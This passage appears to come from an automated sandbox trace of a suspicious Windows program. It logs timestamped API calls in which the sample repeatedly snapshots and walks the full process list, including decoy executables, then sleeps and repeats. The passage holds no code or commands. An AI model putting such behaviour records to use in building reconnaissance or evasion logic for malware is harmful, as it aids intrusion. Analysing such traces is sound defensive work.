th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.385] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.387] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.390] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.395] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.397] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.399] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.419] CloseHandle (hObject=0xbc) returned 1 [0110.419] Sleep (dwMilliseconds=0x12c) [0110.722] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.727] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.732] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.734] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.736] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.738] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, 